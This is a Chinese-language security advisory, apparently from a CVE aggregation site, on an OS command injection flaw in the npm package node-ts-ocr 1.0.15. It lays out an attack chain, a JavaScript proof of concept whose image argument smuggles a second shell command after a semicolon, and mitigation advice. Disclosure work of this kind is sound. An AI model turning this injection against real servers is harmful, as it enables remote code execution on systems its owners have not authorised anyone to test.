IPBUF安全漏洞报告
English
CVE-2025-63705 CVSS 8.8 高危

CVE-2025-63705 node-ts-ocr OS命令注入漏洞

披露日期: 2026-05-07
来源: [email protected]

漏洞信息

漏洞编号
CVE-2025-63705
漏洞类型
OS命令注入
CVSS评分
8.8 高危
攻击向量
网络 (AV:N)
认证要求
低权限 (PR:L)
用户交互
无需交互 (UI:N)
影响产品
node-ts-ocr

相关标签

OS命令注入RCEnode-ts-ocrNPMCVE-2025-63705

漏洞概述

NPM 包 node-ts-ocr 1.0.15 版本中存在操作系统命令注入漏洞。该漏洞源于 src/index.js 文件中的 invokeImageOcr 函数未正确过滤用户输入。攻击者可利用该漏洞在目标服务器上执行任意系统命令,进而获取服务器控制权。此漏洞 CVSS 评分为 8.8,属于高危漏洞,建议用户尽快修复。

技术细节

该漏洞的核心成因在于 node-ts-ocr 库的 src/index.js 文件中 invokeImageOcr 函数的不安全实现。开发者在调用底层 OCR 工具(通常是 Tesseract)时,使用了 child_process.exec 等将输入直接拼接为命令字符串的方法,而非使用参数数组的方式。这使得攻击者能够通过构造包含 shell 元字符(如分号、反引号、管道符等)的恶意输入,截断原始命令并注入任意系统指令。由于 CVSS 评分显示认证要求为低(PR:L),攻击者只需具备基本的低权限访问能力即可发起攻击。一旦利用成功,攻击者可以在服务器上下文中执行任意代码,不仅影响机密性(C:H)、完整性(I:H)和可用性(A:H),还可能导致横向移动,进一步渗透内网环境。此漏洞对于依赖该库进行自动化 OCR 处理的应用构成严重威胁。

攻击链分析

STEP 1
1. 信息收集
攻击者确认目标应用使用了 node-ts-ocr 库,并确定了调用 invokeImageOcr 函数的接口位置。
STEP 2
2. 构造Payload
攻击者构造包含 Shell 元字符(如 ';' 或 '|')的恶意输入字符串,旨在拼接并执行恶意系统命令。
STEP 3
3. 发起攻击
攻击者向应用程序发送请求,将构造好的恶意 Payload 作为参数传递给 invokeImageOcr 函数。
STEP 4
4. 命令执行
由于应用未过滤输入,底层系统直接执行了拼接后的恶意命令,攻击者获得服务器权限。
STEP 5
5. 维持权限
攻击者利用执行的权限安装后门、窃取数据或进一步横向移动。

PoC / 利用代码

⚠️ 仅供安全研究
以下代码仅用于安全研究和授权测试,未经授权使用属于违法行为。
PoC
// PoC for CVE-2025-63705: OS Command Injection in node-ts-ocr // Description: Exploiting the invokeImageOcr function to execute arbitrary OS commands. const { invokeImageOcr } = require('node-ts-ocr'); // Attempting to inject a command using a semicolon separator // This payload tries to create a file named 'pwned' in /tmp const maliciousPayload = "valid_image.jpg; touch /tmp/pwned"; console.log(`[+] Sending payload: ${maliciousPayload}`); invokeImageOcr({ image: maliciousPayload }).then((result) => { console.log("[+] OCR function returned (command likely executed):", result); }).catch((error) => { console.log("[-] Error occurred (command may have still executed before failure):", error); });

影响范围

node-ts-ocr 1.0.15

防御指南

临时缓解措施
如果无法立即升级,建议严格限制传递给 invokeImageOcr 函数的输入格式,确保只包含字母数字字符和特定的路径分隔符。同时,在应用防火墙(WAF)层面增加对常见命令注入字符的检测规则。

参考链接

法律声明

以上信息仅供安全研究和授权渗透测试使用。未经授权对他人系统进行测试属于违法行为。利用本报告内容进行非法活动者,后果自负。

快速导航: 前沿安全 最新收录域名列表 最新威胁情报列表 最新网站排名列表 最新工具资源列表 最新CVE漏洞列表